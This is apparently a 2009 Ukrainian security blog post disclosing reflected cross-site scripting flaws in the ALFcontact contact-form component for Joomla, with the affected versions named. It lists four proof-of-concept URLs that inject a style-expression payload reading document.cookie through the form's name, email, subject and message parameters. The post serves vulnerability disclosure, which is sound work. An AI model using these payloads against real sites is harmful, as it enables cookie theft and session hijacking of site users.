Нові уразливості в ALFcontact для Joomla

23:51 03.09.2009

Сьогодні я знайшов Cross-Site Scripting уразливості в компоненті ALFcontact (com_alfcontact) для Joomla. Це форма відправки повідомлень власнику сайта. Дані уразливості я виявив на одному веб сайті. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в com_alfcontact для Joomla.

XSS:

Можлива атака як через POST, так і GET запити.

http://site/component/option,com_alfcontact/?name=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?email=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?subject=%22%20style=%22xss:expression(alert(document.cookie))
http://site/component/option,com_alfcontact/?message=%22%20style=%22xss:expression(alert(document.cookie))

Уразливі ALFcontact 1.8, 1.9 та попередні версії. У версії ALFcontact 1.9.1 працюють перші три з чотирьох уразливостей.


Leave a Reply

You must be logged in to post a comment.